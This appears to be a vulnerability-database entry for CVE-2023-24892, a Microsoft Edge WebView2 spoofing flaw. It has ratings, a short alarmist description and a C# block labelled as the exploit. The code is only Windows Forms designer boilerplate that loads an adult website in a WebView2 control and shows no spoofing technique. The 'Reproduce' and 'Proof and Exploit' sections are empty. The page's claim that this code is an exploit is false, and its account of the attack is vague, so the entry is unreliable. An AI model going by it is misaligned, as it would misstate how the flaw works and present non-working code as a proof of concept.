CVE-2023-24892 (High)
Description
Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability
Ratings
- Attacker Value: High
- Exploitability: Medium
Technical Analysis
CVE-2023-24892: Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability
Description:
The Webview2 development platform is vulnerable to spoofing attacks.
The attacker can build a very malicious web application and spread it to the victim's networks, by using a malicious server for this case,
and when they download it and open it, this can be the last web app opening for them. The web application contains a malicious link, and this URL can be absolutely dangerous for the victim who opened it.
STATUS: HIGH Vulnerability
[+]Exploit structure:

```csharp
namespace CVE_2023_24892
{
    partial class Form1
    {
        /// <summary>
        /// Required designer variable.
        /// </summary>
        private System.ComponentModel.IContainer components = null;

        /// <summary>
        /// Clean up any resources being used.
        /// </summary>
        /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
        protected override void Dispose(bool disposing)
        {
            if (disposing && (components != null))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        #region Windows Form Designer generated code

        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            this.webView21 = new Microsoft.Web.WebView2.WinForms.WebView2();
            ((System.ComponentModel.ISupportInitialize)(this.webView21)).BeginInit();
            this.SuspendLayout();
            //
            // webView21
            //
            this.webView21.AllowExternalDrop = false;
            this.webView21.CreationProperties = null;
            this.webView21.DefaultBackgroundColor = System.Drawing.Color.Magenta;
            this.webView21.Location = new System.Drawing.Point(1, 49);
            this.webView21.Name = "webView21";
            this.webView21.Size = new System.Drawing.Size(797, 402);
            this.webView21.Source = new System.Uri("https://www.pornhub.com/", System.UriKind.Absolute);
            this.webView21.TabIndex = 0;
            this.webView21.ZoomFactor = 1D;
            //
            // Form1
            //
            this.AutoScaleDimensions = new System.Drawing.SizeF(8F, 16F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.ClientSize = new System.Drawing.Size(800, 450);
            this.Controls.Add(this.webView21);
            this.Name = "Form1";
            this.Text = "CVE-2023-24892";
            ((System.ComponentModel.ISupportInitialize)(this.webView21)).EndInit();
            this.ResumeLayout(false);
        }

        #endregion

        private Microsoft.Web.WebView2.WinForms.WebView2 webView21;
    }
}
```
Reproduce:
Proof and Exploit:
More:
Time spent: 03:00:00
General Information
Vendors
- microsoft
Products
- edge chromium